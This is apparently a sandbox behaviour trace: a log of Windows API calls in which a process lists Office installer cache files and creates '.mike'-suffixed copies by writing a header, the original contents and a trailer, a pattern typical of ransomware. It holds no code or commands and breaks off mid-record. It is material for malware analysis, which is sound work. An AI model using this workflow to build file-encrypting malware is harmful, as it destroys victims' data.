FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.901] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0041.901] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16771fb0, ftCreationTime.dwHighDateTime=0x1cb12b4, ftLastAccessTime.dwLowDateTime=0x16771fb0, ftLastAccessTime.dwHighDateTime=0x1cb12b4, ftLastWriteTime.dwLowDateTime=0x46536400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0041.901] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec54b6b0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xec54b6b0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x4a687710, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0041.901] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde72fbf0, ftCreationTime.dwHighDateTime=0x1cb0d0b, ftLastAccessTime.dwLowDateTime=0xde72fbf0, ftLastAccessTime.dwHighDateTime=0x1cb0d0b, ftLastWriteTime.dwLowDateTime=0x49c902c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0041.901] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9c380f0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xc9c380f0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x465d00f0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0041.901] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7c66670, ftCreationTime.dwHighDateTime=0x1cb0ee5, ftLastAccessTime.dwLowDateTime=0xe7c66670, ftLastAccessTime.dwHighDateTime=0x1cb0ee5, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0041.902] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95261510, ftCreationTime.dwHighDateTime=0x1cb048a, ftLastAccessTime.dwLowDateTime=0x95261510, ftLastAccessTime.dwHighDateTime=0x1cb048a, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0041.902] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb7e7af0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xeb7e7af0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x49c691c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0041.902] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80aa51d0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80aa51d0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0041.902] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749b0240, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x749b0240, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x46a46a30, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb9fa2f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisiorWW.cab", cAlternateFileName="")) returned 1 [0041.902] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80711960, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80711960, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468ee660, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb80800, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisiorWW.msi", cAlternateFileName="")) returned 1 [0041.902] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 1 [0041.902] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.902] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0041.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0041.903] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpFilePart=0x0) returned 0x4d [0041.903] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.903] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.903] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.903] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.936] GetFileType (hFile=0x264) returned 0x1 [0041.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.936] GetFileType (hFile=0x264) returned 0x1 [0041.936] CloseHandle (hObject=0x264) returned 1 [0041.936] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.936] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.936] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.936] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.937] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x218102c | out: lpFileInformation=0x218102c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16771fb0, ftCreationTime.dwHighDateTime=0x1cb12b4, ftLastAccessTime.dwLowDateTime=0x16771fb0, ftLastAccessTime.dwHighDateTime=0x1cb12b4, ftLastWriteTime.dwLowDateTime=0x46536400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x10b2)) returned 1 [0041.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.937] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.937] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x2181364 | out: lpFileInformation=0x2181364*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16771fb0, ftCreationTime.dwHighDateTime=0x1cb12b4, ftLastAccessTime.dwLowDateTime=0x16771fb0, ftLastAccessTime.dwHighDateTime=0x1cb12b4, ftLastWriteTime.dwLowDateTime=0x46536400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x10b2)) returned 1 [0041.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.937] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.937] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.937] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.937] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.937] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.938] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.938] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.938] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.938] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.938] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.938] GetFileType (hFile=0x264) returned 0x1 [0041.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.938] GetFileType (hFile=0x264) returned 0x1 [0041.938] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.938] WriteFile (in: hFile=0x264, lpBuffer=0x21822a0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21822a0*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.939] CloseHandle (hObject=0x264) returned 1 [0041.939] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.940] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x2181d74 | out: lpFileInformation=0x2181d74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16771fb0, ftCreationTime.dwHighDateTime=0x1cb12b4, ftLastAccessTime.dwLowDateTime=0x16771fb0, ftLastAccessTime.dwHighDateTime=0x1cb12b4, ftLastWriteTime.dwLowDateTime=0x46536400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x10b2)) returned 1 [0041.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.940] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.940] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.940] GetFileType (hFile=0x264) returned 0x1 [0041.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.940] GetFileType (hFile=0x264) returned 0x1 [0041.940] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.940] ReadFile (in: hFile=0x264, lpBuffer=0x21833dc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21833dc*, lpNumberOfBytesRead=0x2af110*=0x10b2, lpOverlapped=0x0) returned 1 [0041.942] CloseHandle (hObject=0x264) returned 1 [0041.942] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.942] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.942] GetFileType (hFile=0x264) returned 0x1 [0041.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.942] GetFileType (hFile=0x264) returned 0x1 [0041.942] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.943] WriteFile (in: hFile=0x264, lpBuffer=0x218b4f0*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x218b4f0*, lpNumberOfBytesWritten=0x2af124*=0x10c0, lpOverlapped=0x0) returned 1 [0041.943] CloseHandle (hObject=0x264) returned 1 [0041.944] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0041.944] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.944] GetFileType (hFile=0x264) returned 0x1 [0041.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0041.944] GetFileType (hFile=0x264) returned 0x1 [0041.945] WriteFile (in: hFile=0x264, lpBuffer=0x218e930*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x218e930*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.945] CloseHandle (hObject=0x264) returned 1 [0041.946] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.946] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.946] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3341000, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3341000, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3341000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x12e0)) returned 1 [0041.946] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.946] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.946] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21900f0 | out: lpFileInformation=0x21900f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3341000, 